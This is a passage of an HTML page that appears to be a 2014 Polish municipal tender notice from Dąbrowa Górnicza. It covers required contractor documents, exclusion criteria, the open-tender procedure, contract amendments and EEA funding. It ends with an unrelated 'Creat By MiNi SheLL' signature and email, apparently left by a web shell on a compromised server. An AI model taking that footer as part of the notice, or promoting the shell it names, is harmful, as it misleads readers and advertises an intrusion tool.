<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1 w zakresie zmiany terminów:
1.1. zmiany terminu wykonania zamówienia, w następstwie wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć; wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie zamówienia, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.2. na skutek wydłużenia terminu wykonania prac w ramach realizacji zadań B lub C, które to prace są  przedmiotem postępowania nr ZP.WIM. 271.4.29.2014 i które są niezbędne do wykonania zadania D.
2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. poprawy jakości lub innych parametrów charakterystycznych dla danego elementu zamówienia,
2.2. zmiany obowiązujących przepisów prawa,
2.3. rezygnacji z całości lub części zamówienia zgodnie z art. 145 Ustawy Pzp,
2.4. zmiany podwykonawców na skutek zdarzeń losowych, wypowiedzenia umowy przez generalnego wykonawcę czy powierzenia zamówienia kolejnym podwykonawcom za zgodą Zamawiającego,
2.5. zmiany podatku VAT na skutek zmian w przepisach prawnych:
a). W przypadku zwiększenia stawki podatku VAT ceny jednostkowe brutto nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy.
b). W przypadku zmniejszenia stawki podatku VAT ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Wartość wynagrodzenia brutto może ulec zmniejszeniu. 
3. W przypadku wystąpienia wyżej wymienionych okoliczności strony poinformują się natychmiast o ich zaistnieniu.
4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
6. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ - projekt umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędzie
Miejskim w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Inwestycji Miejskich, II piętro, pokój
nr 222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, 
ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie realizowane w ramach wdrażanego przez Ministerstwo Infrastruktury i Rozwoju Programu Regionalnego Rozwój miast poprzez wzmocnienie kompetencji jednostek samorządu terytorialnego, dialog społeczny oraz współpracę z przedstawicielami społeczeństwa obywatelskiego, dofinansowanego ze środków Mechanizmu Finansowego EOG i
środków krajowych na lata 2009-2014. 2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału     w postępowaniu określone w pkt. 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie              z zapisami zawartymi w pkt. 9 SIWZ.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. i 9.3. SIWZ podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, dokumenty wymienione w pkt. 9.1.2. i 9.1.3. SIWZ, Formularz ofertowy wymieniony w pkt. 9.5.1. SIWZ składają wszyscy Wykonawcy wspólnie lub pełnomocnik w imieniu wszystkich Wykonawców.
Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
 Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem. 4. ciąg dalszy nazwy zamówienia dot. sekcji II.1.1. ogłoszenia: Rozwój miast poprzez wzmocnienie kompetencji jednostek samorządu terytorialnego, dialog społeczny oraz współpracę z przedstawicielami społeczeństwa obywatelskiego, dofinansowanego ze środków Mechanizmu Finansowego EOG i środków krajowych na lata 2009-2014..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com